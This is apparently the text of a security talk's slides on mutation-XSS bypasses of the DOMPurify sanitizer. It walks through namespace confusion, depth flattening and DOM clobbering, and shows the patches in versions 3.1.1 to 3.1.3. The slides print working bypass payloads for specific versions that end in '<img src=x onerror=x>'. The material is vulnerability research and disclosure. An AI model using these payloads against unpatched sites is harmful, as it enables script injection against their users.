Kévin GERVOT
A security feature or tool used to clean HTML content by removing or altering potentially dangerous elements, attributes, or scripts, thereby preventing cross-site scripting (XSS) and other code injection attacks.
Source: ChatGPT 🤫
Highly simplified version of the DOMPurify logic
HTML string → parse HTML → sanitize Elements / sanitize Attributes / sanitize Shadow DOM → serialize HTML → HTML string
It is possible that the output of this algorithm, if parsed with an HTML parser, will not return the original tree structure.
[...]
Dom Tree
<form>
<div>
<form>
<form>
<div></form>
<form>
</form>
html
xhtml
xhtml
xhtml
Dom Tree
<form>
<div>
xhtml
xhtml
xhtml
What the sanitizer sees
What the DOM sees
<style><a>
Dom Tree: <style> (xhtml) > "<a>" (text)
<svg><style><a>
Dom Tree: <svg> (svg) > <style> (svg) > <a> (svg, node)
<math><style><a>
Dom Tree: <math> (mathml) > <style> (mathml) > <a> (mathml, node)
List of MathML text integration points:
<mi> | <mo> | <mn> | <ms> | <mtext>
List of HTML integration points:
<annotation-xml>
<foreignObject>
<desc>
<title>
<svg><title><a>
Dom Tree: <svg> (svg) > <title> (svg) > <a> (xhtml)
We can switch from SVG to HTML!
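The two lists above can be turned into a small lookup to predict where an ordinary child element such as `<a>` ends up. This is only a sketch under stated assumptions: `childNamespace` and the plain `{ namespace, tagName, encoding }` objects are hypothetical stand-ins rather than a browser or DOMPurify API, and the special "breakout" tags of the HTML parser are not modelled.

```javascript
// Namespace labels as used in the slides' DOM tree diagrams.
const NS = { HTML: 'xhtml', SVG: 'svg', MATHML: 'mathml' };

// Element names from the slide, lowercased for comparison.
const MATHML_TEXT_INTEGRATION_POINTS = new Set(['mi', 'mo', 'mn', 'ms', 'mtext']);
const SVG_HTML_INTEGRATION_POINTS = new Set(['foreignobject', 'desc', 'title']);

/**
 * Hypothetical helper: namespace of an ordinary child element (for
 * example <a>) opened directly inside `parent`.
 * Not modelled: <svg>/<math> children, and tags that break out of
 * foreign content.
 */
function childNamespace(parent) {
  const tag = parent.tagName.toLowerCase();
  if (parent.namespace === NS.SVG) {
    return SVG_HTML_INTEGRATION_POINTS.has(tag) ? NS.HTML : NS.SVG;
  }
  if (parent.namespace === NS.MATHML) {
    if (MATHML_TEXT_INTEGRATION_POINTS.has(tag)) return NS.HTML;
    if (tag === 'annotation-xml') {
      // Only an HTML integration point with an HTML-like encoding attribute.
      const enc = (parent.encoding || '').toLowerCase();
      return enc === 'text/html' || enc === 'application/xhtml+xml' ? NS.HTML : NS.MATHML;
    }
    return NS.MATHML;
  }
  return NS.HTML;
}

// <svg><title><a>: the <a> switches to the HTML namespace.
const insideTitle = childNamespace({ namespace: NS.SVG, tagName: 'title' });
// <svg><style><a>: the <a> stays in the SVG namespace.
const insideSvgStyle = childNamespace({ namespace: NS.SVG, tagName: 'style' });
```

The lookup only mirrors the cases drawn on the slides; a real parser decides per token and keeps more state.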
<svg></p><style><a id="</style><img src=x onerror=x>">
DOMPurify 2.0.0
<svg>
<p>
html
<style>
<a id="</style>XSS">
.innerHTML
<svg>
svg
<p>
xhtml
<style><a id="</style>
<img src=x onerror=x>">
(Found by @SecurityMB)
xhtml
xhtml
svg
svg
svg
svg
The <style> tag falls into the HTML namespace, changing its content from a node to text.
The algorithm described below places no limit on the depth of the DOM tree generated, or on the length of tag names, attribute names, attribute values, Text nodes, etc.
Language | Library | Nested node limit | Handling |
---|---|---|---|
C | libxml2 | 255 | Removing |
JavaScript | parse5 | No limit? | - |
Python | html.parser | No limit? | - |
Java | Jsoup | No limit? | - |
Browser | DOMParser | 512 | Flattening |
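The "Flattening" behaviour in the last row can be pictured with a toy tree builder. This is a rough sketch, not browser code: `buildNested` and `maxDepth` are hypothetical helpers, nodes are plain objects, and how a real parser counts `<html>` and `<body>` towards the limit is not modelled.

```javascript
/**
 * Toy tree builder: opens `count` nested <div> elements but never lets
 * more than `limit` elements stay open. Once the limit is reached, the
 * current node is popped first, so the new element becomes a sibling
 * instead of a child (flattening).
 */
function buildNested(count, limit) {
  const root = { tag: '#root', children: [] };
  const stack = [root];
  for (let i = 0; i < count; i++) {
    // stack.length - 1 is the number of currently open elements.
    if (stack.length - 1 >= limit) stack.pop();
    const node = { tag: 'div', children: [] };
    stack[stack.length - 1].children.push(node);
    stack.push(node);
  }
  return root;
}

/** Depth of the deepest element below `root` (root itself is depth 0). */
function maxDepth(root) {
  let max = 0;
  const todo = [[root, 0]];
  while (todo.length > 0) {
    const [node, depth] = todo.pop();
    if (depth > max) max = depth;
    for (const child of node.children) todo.push([child, depth + 1]);
  }
  return max;
}

const shallow = maxDepth(buildNested(100, 512)); // below the limit: untouched
const capped = maxDepth(buildNested(600, 512));  // above the limit: flattened
```

With flattening, elements past the limit are kept but attached at a different place in the tree than the markup suggests.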
<div*509><svg><style>
Dom Tree
<div*509>
<svg>
<style>
xhtml
svg
<div*510><svg><style>
Dom Tree
<div*510>
<svg>
<style>
html
xhtml
svg
svg
svg
html
<a><a>
Dom Tree
<a>
xhtml
svg
<div*509><a><svg><a>
Dom Tree
<div*509>
<a>
<svg>
<a>
html
xhtml
xhtml
svg
<a>
xhtml
svg
html
13.2.4 Parse state
13.2.4.1 The insertion mode
13.2.4.2 The stack of open elements
13.2.4.3 The list of active formatting elements
13.2.4.4 The element pointers
13.2.4.5 Other parsing state flags
Source: HTML Specification.
The insertion mode is a state variable that controls the primary operation of the tree construction stage.
Initially, the insertion mode is "initial". It can change to "before html" [...] "after after frameset" during the course of the parsing [...]. The insertion mode affects how tokens are processed [...].
The user agent must handle the token as follows:
[...]
↳ A start tag whose tag name is one of: "caption" [...]
[...]
Pop elements from this stack until a caption element has been popped from the stack.
The stack grows downwards; the topmost node on the stack is the first one added to the stack, and the bottommost node of the stack is the most recently added node in the stack [...].
<table>
<caption>
<div>1</div>
<div>2</div>
</caption>
</table>
html
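The "pop elements until a caption element has been popped" rule quoted earlier can be sketched on a plain array, where the last item plays the role of the spec's bottommost (most recently added) node. `popUntil` is a hypothetical helper written for illustration, and the stack contents are an assumed snapshot of the parser state inside `<table><caption><div>`.

```javascript
/**
 * Pops entries from a stack of open elements until an entry with the
 * given tag name has been popped. Returns the popped entries in order.
 */
function popUntil(stack, tagName) {
  const popped = [];
  while (stack.length > 0) {
    const node = stack.pop();
    popped.push(node);
    if (node === tagName) break;
  }
  return popped;
}

// Assumed stack of open elements while parsing inside <table><caption><div>.
const openElements = ['html', 'body', 'table', 'caption', 'div'];

// A second <caption> start tag arrives: everything down to the first
// caption is closed, whatever was still open inside it.
const popped = popUntil(openElements, 'caption');
```

After the call, `openElements` ends at `table`, so whatever comes next is handled as table content rather than as a child of the first caption.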
<table>
<caption>
<div>1</div>
<caption></caption>
<div>2</div>
</caption>
</table>
Dom Tree
<div>2</div>
<table>
<div>1</div>
xhtml
xhtml
<caption>
xhtml
<caption>
xhtml
xhtml
html
<table><caption>
<svg>
<title>
<caption></caption>
</title>
<style><a id="</style><img src onerror=x>"></a></style>
</svg>
</caption></table>
Dom Tree
<table>
xhtml
<caption>
xhtml
<svg>
svg
<title>
svg
<caption>
xhtml
<style><a id="</style>
html
<img src=x onerror=x><
xhtml
xhtml
It can even traverse namespaces!
[...]
↳ Anything else
Process the token using the rules for the "in body" insertion mode.
<table><caption><table><caption>
Dom Tree
<table>
xhtml
svg
svg
<div*508>
<table><caption><table><caption>
Dom Tree
<div*508>
<table>
<caption>
<table>
html
xhtml
xhtml
xhtml
<caption>
<caption>
<table>
xhtml
<caption>
xhtml
xhtml
xhtml
xhtml
html
Nested <caption> through node flattening!
<div*506>
<table><caption>
<svg>
<title>
<table><caption></caption></table>
</title>
<style><a id="</style><img src onerror=x>"></a></style>
</svg>
</caption></table>
DOMPurify 3.1.0
<div*506>
<table>
xhtml
xhtml
<caption>
xhtml
<svg>
<title>
svg
<table>
<caption>
xhtml
<style>
<a id="[...]">
html
svg
xhtml
svg
svg
.innerHTML
<div*506>
<img src onerror=x>">
xhtml
xhtml
<table>
xhtml
<caption>
xhtml
<svg>
svg
<title>
svg
<table>
xhtml
<caption>
<style><a id="</style>
xhtml
xhtml
1. The nested nodes limit is set to 252
currentNode.__depth = currentNode.parentNode.__depth + 1;
/* Remove an element if nested too deeply to avoid mXSS */
if (currentNode.__depth >= MAX_NESTING_DEPTH) {
  _forceRemove(currentNode);
}
Highly simplified version of the DOMPurify 3.1.1 fix
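To see the depth check in action without a browser, the same bookkeeping can be run over plain objects. This is a minimal sketch, not DOMPurify's code: `forceRemove`, `enforceDepth` and `chain` are hypothetical helpers, and the constant simply reuses the figure of 252 quoted on the slide.

```javascript
// Limit quoted on the slide; the exact constant in the library is an assumption here.
const MAX_NESTING_DEPTH = 252;

/** Stand-in for _forceRemove: detaches `node` from its parent's children. */
function forceRemove(node) {
  const siblings = node.parentNode.children;
  siblings.splice(siblings.indexOf(node), 1);
}

/** Walks the tree top-down, tags each node with __depth, removes nodes that are too deep. */
function enforceDepth(root) {
  root.__depth = 0;
  const queue = [...root.children];
  while (queue.length > 0) {
    const currentNode = queue.shift();
    currentNode.__depth = currentNode.parentNode.__depth + 1;
    if (currentNode.__depth >= MAX_NESTING_DEPTH) {
      forceRemove(currentNode); // its whole subtree goes with it
      continue;
    }
    queue.push(...currentNode.children);
  }
}

/** Builds a chain of `n` nested plain-object nodes under a fresh root. */
function chain(n) {
  const root = { parentNode: null, children: [] };
  let parent = root;
  for (let i = 0; i < n; i++) {
    const node = { parentNode: parent, children: [] };
    parent.children.push(node);
    parent = node;
  }
  return root;
}

const tree = chain(300);
enforceDepth(tree);

// Count how many nested levels survived.
let remaining = 0;
for (let n = tree; n.children.length > 0; n = n.children[0]) remaining++;
```

The check depends entirely on `parentNode.__depth` being a trustworthy number.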
2. DOM Clobbering protection
elm instanceof HTMLFormElement && (
  typeof elm.__depth !== 'undefined' &&
  typeof elm.__depth !== 'number'
)
Highly simplified version of the DOMPurify 3.1.1 fix
<div id="x">
<form id="y">
<input name="z">
</form>
</div>
» x
← <div [...]>
» y.z
← <input [...]>
<div>
<form id="f">
<input name="parentNode">
</form>
</div>
» f.parentNode
← <input name="pare[..]">
» f.parentNode.__depth
← undefined
currentNode.__depth = currentNode.parentNode.__depth + 1;
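Why a clobbered `parentNode` defeats the depth check comes down to plain JavaScript arithmetic. The sketch below uses ordinary objects in place of DOM nodes (an assumption made so it runs anywhere), with the `form` object's `parentNode` pointing at the `<input>` just as in the console output above; the limit of 252 is the figure from the earlier slide.

```javascript
const MAX_NESTING_DEPTH = 252; // figure quoted on the earlier slide

// Plain objects standing in for DOM nodes.
const input = { name: 'parentNode' };   // carries no __depth of its own
const form = { parentNode: input };     // clobbered: points at the <input>, not the real parent

// Same expression as in the simplified fix.
const depth = form.parentNode.__depth + 1; // undefined + 1

// Any comparison with NaN is false, so the node is never removed.
const wouldBeRemoved = depth >= MAX_NESTING_DEPTH;
```

Every descendant then inherits a `NaN` depth as well, so the limit stops applying below the clobbered form.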
<div*200><form><input name="parentNode"><div*200>
DOMPurify 3.1.1
<div*200>
html
xhtml
<form>
xhtml
<input>
xhtml
<div*200>
xhtml
html
<div*200>
<form>
<input name="parentNode">
<div*200>
<form></form><form>
<input name="parentNode">
<div*105>
DOMPurify 3.1.0 Bypass
<svg><title><a>
DOMPurify 3.1.2
<svg>
html
svg
<title>
svg
1. Access .parentNode using the getter.
2. Block SVG-to-HTML namespace switch.
const HTML_INTEGRATION_POINTS = ['foreignobject', 'annotation-xml'];
Highly simplified version of the DOMPurify 3.1.2 fix
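Point 1 relies on reading `parentNode` through the accessor defined on the prototype instead of through the instance, which a shadowing property cannot intercept. The sketch below emulates this with a hypothetical `FakeNode` class, since real DOM classes are not available outside a browser; treat it as an illustration of the idea rather than the library's implementation.

```javascript
// Hypothetical stand-in for a DOM node class with a parentNode accessor.
class FakeNode {
  constructor(parent) {
    this._parent = parent;
  }
  get parentNode() {
    return this._parent;
  }
}

const realParent = new FakeNode(null);
const form = new FakeNode(realParent);
const clobber = { name: 'parentNode' };

// Emulate clobbering: an own property shadows the prototype accessor.
Object.defineProperty(form, 'parentNode', { value: clobber });

// Grab the original getter once, from the prototype.
const getParentNode = Object.getOwnPropertyDescriptor(FakeNode.prototype, 'parentNode').get;

const viaProperty = form.parentNode;        // the clobbering object
const viaGetter = getParentNode.call(form); // the real parent
```

Calling the stored getter with `.call(node)` bypasses whatever the instance exposes under the same name.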
<form id="x"></form>
<input form="y" name="z">
» x.id="y"
← "y"
» x.z
← undefined
» y.z
← <input [...] name="z">
<div id="a "></div>
DOMPurify 3.1.2
<div id="a">
html
xhtml
<form id="a "><div*500></div*500></form>
<input form="a" name="__depth">
DOMPurify 3.1.2
<form id="a">
html
xhtml
<div*500>
xhtml
<input name="__depth">
xhtml
For some obscure reason, it doesn't work on Firefox :(
... FUZZING!
<x><y><z>
<button>
<z>
<button></button>
</z>
</button>
<style></style>
</z></y></x>
DOM Tree
<x>
<y>
xhtml
xhtml
<z>
xhtml
<button>
xhtml
<z>
<button>
<style>
xhtml
html
xhtml
xhtml
<button> can be <dd>, <dt>, <li> or <table>
<x><y><z>
<button>
<x>
<button></button>
</x>
</button>
<style></style>
</z></y></x>
DOM Tree
<x>
<y>
xhtml
xhtml
<z>
xhtml
<button>
xhtml
<x>
<button>
<style>
xhtml
html
xhtml
xhtml
<button> can be <dd>, <dt>, <li> or <table>
<svg><y><title><z>
<button>
<y><z>
<button></button>
</z></y>
</button>
<style></style>
</z></title></y></svg>
DOM Tree
<svg>
<y>
svg
<title>
svg
svg
<style>
html
It can even traverse namespaces!
[Elevator]
xhtml
svg
svg
<z>
xhtml
const COMMON_SVG_AND_HTML_ELEMENTS = addToSet({}, [
  'title',
  'style',
  'font',
  'a',
  'script',
]);
Source: DOMPurify - /src/purify.js.
Can't switch from SVG namespace to HTML namespace...
... FUZZING!
<x><svg>
<image><x>
<title>
<image></image>
</title>
</x></image>
<style></style>
</svg></x>
DOM Tree
<x>
<svg>
xhtml
svg
<image>
svg
<x>
svg
<image>
<style>
xhtml
html
Browser <image> to <img> conversion works too!
<title>
svg
svg
<div*507>
<svg>
<image>
<title>
<svg>
<image></image>
</svg>
</title>
</image>
</svg>
DOM Tree
<div*507>
<svg>
xhtml
svg
<image>
svg
<title>
svg
<image>
html
svg
<svg>
svg
Even if we use HTML integration points, we do not switch to HTML :)
<form id="x ">
<div*504>
<a><svg>
<image>
<a><title>
<svg><image></image></svg>
</title></a>
</image>
<style><a id="</style><img src=x onerror=x>"></a></style>
</svg></a>
<input form="x" name="__depth">
DOMPurify 3.1.2
<form id="x">
<div*504>
xhtml
xhtml
<a>
xhtml
<svg>
xhtml
<image>
svg
<a>
svg
<title>
<svg>
<image>
html
<style>
<a>
<input name="__depth">
svg
svg
svg
svg
svg
xhtml
.innerHTML
<form id="x">
<div*504>
xhtml
xhtml
<a>
xhtml
<svg>
xhtml
<image>
svg
<a>
svg
<title>
<svg>
<img>
<style><a id="</style>
<img src onerror=x>">
<input name="__depth">
svg
svg
xhtml
xhtml
xhtml
xhtml
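function sanitizeMore(txt, config) {
  // First pass: DOMPurify.sanitize is called without a configuration.
  return DOMPurify.sanitize(txt);
}
// Second pass: the already sanitized string is parsed and sanitized again.
text = DOMPurify.sanitize(sanitizeMore(text, config), config);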
Highly simplified version of the Mermaid.js sanitizing process.
${"<form><h1></form><table><form></form></table></form></table></h1></form>".repeat(510)}
<math>
<mi>
<style><!--</style>
<style id="--></style></mi></math><img src=x onerror=x>"></style>
</mi>
</math>
DOMPurify 3.1.2
<form>
<h1>
xhtml
<table>
<form>
"mXSS payload"
mathml
<math>
mathml
html
xhtml
xhtml
xhtml
x510
Depth of 4
.innerHTML
<form>
<h1>
xhtml
<table>
<form>
<table>
<h1>
xhtml
xhtml
xhtml
<math>
<mi>
New depth = number of patterns = 510
mathml
<style><!--</style>
<style id="-->XSS"></style>
xhtml
xhtml
[...]
xhtml
mathml
xhtml
xhtml
.innerHTML
<form>
<h1>
xhtml
<table>
<h1>
<table>
xhtml
xhtml
xhtml
<math>
<mi>
mathml
<style><!--[...]--></style>
<img src=x onerror=x>"<
xhtml
xhtml
xhtml
[...]
mathml
mathml
if (regExpTest(/((--!?|])>)|<\/(style|title)/i, value)) {
  _removeAttribute(name, currentNode);
  continue;
}
Highly simplified version of the DOMPurify 3.1.3 fix
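The pattern in this check can be tried on its own to see which attribute values it flags. The regular expression is copied from the snippet above; the wrapper `isSuspiciousAttributeValue` is a hypothetical name used only for this sketch.

```javascript
// Pattern copied from the simplified fix: comment terminators ("-->", "--!>"),
// "]>", and closing </style> or </title> tags, case-insensitively.
const SUSPICIOUS_ATTR_VALUE = /((--!?|])>)|<\/(style|title)/i;

/** Hypothetical wrapper: true when an attribute value would be dropped by the check. */
function isSuspiciousAttributeValue(value) {
  return SUSPICIOUS_ATTR_VALUE.test(value);
}

const flagged = ['-->', '--!>', ']>', '</style><img src=x onerror=x>', '</TITLE>']
  .map(isSuspiciousAttributeValue);
const allowed = ['plain-id', 'a > b', 'style', '<!--']
  .map(isSuspiciousAttributeValue);
```

Values in the first list would have their attribute removed; values in the second pass through unchanged.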
<div id="-->"></div>
DOMPurify 3.1.2
<div>
html
xhtml